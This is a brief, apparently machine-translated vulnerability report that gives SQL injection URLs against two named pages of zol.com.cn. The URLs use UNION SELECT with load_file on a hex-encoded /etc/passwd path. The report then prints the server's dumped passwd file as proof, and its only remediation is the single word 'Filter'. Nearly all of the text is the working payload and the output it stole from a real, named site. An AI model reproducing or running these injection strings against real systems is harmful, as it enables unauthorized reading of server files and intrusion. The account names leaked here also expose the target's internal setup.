Http://viewsonic.zol.com.cn/detail.php? Id =-1428 + union + select + 1, 2 /*
Http://active.zol.com.cn/08active/413ainol/detail.php? Id =-9021/**/union/**/select/**/load_file (0x2F6574632F706173737764), 2, 3, 4 /*
Proof of vulnerability:
Http://active.zol.com.cn/08active/413ainol/detail.php? Id =-9021/**/union/**/select/**/load_file (0x2F6574632F706173737764), 2, 3, 4 /*
Root: x: 0: 0: root:/bin/bash bin: x: 1: 1: bin:/sbin/nologin daemon: x: 2: 2: daemon:/sbin/nologin adm: x: 3: 4: adm:/var/adm:/sbin/nologin lp: x: 4: 7: lp: /var/spool/lpd:/sbin/nologin sync: x: 5: 0: sync:/sbin:/bin/sync shutdown: x: 6: 0: shutdown: /sbin:/sbin/shutdown halt: x: 7: 0: halt:/sbin/halt mail: x: 8: 12: mail: /var/spool/mail:/sbin/nologin news: x: 9: 13: news:/etc/news: uucp: x: 10: 14: uucp: /var/spool/uucp:/sbin/nologin operator: x: 11: 0: operator:/root:/sbin/nologin games: x: 12: 100: games: /usr/games:/sbin/nologin gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin ftp: x: 14: 50: FTP User: /var/ftp:/sbin/nologin nobody: x: 99: 99: Nobody: // sbin/nologin messages: x: 81: 81: System message bus :/: /sbin/nologin vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin rpm: x: 37: 37:/var/lib/rpm: /sbin/nologin haldaemon: x: 68: 68: HAL daemon: // sbin/nologin netdump: x: 34: 34: Network Crash Dump user:/var/crash: /bin/bash nscd: x: 28: 28: NSCD Daemon: // sbin/nologin sshd: x: 74: 74: Privilege-separated SSH: /var/empty/sshd:/sbin/nologin rpc: x: 32: 32: Portmapper RPC user: // sbin/nologin mailnull: x: 47: 47 :: /var/spool/mqueue:/sbin/nologin smmsp: x: 51: 51:/var/spool/mqueue:/sbin/nologin rpcuser: x: 29: 29: RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody: x: 4294967294: 4294967294: Anonymous NFS User:/var/lib/nfs:/sbin/nologin pcap: x: 77: 77:/var/arpwatch:/sbin/nologin xfs: x: 43: 43: X Font Server:/etc/X11/fs: /sbin/nologin pegasus: x: 66: 65: tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin mysql: x: 27: 27: :/home/mysql:/bin/bash ntp: x: 38: 38:/etc/ntp:/sbin/nologin hpsmh: x: 79: 79:/hpsmh: /sbin/nologin nagios: x: 100: 101: nagios:/var/log/nagios:/bin/sh sehmuzb: x: 500: 500:/home/sehmuzb: /bin/bash
Solution: Filter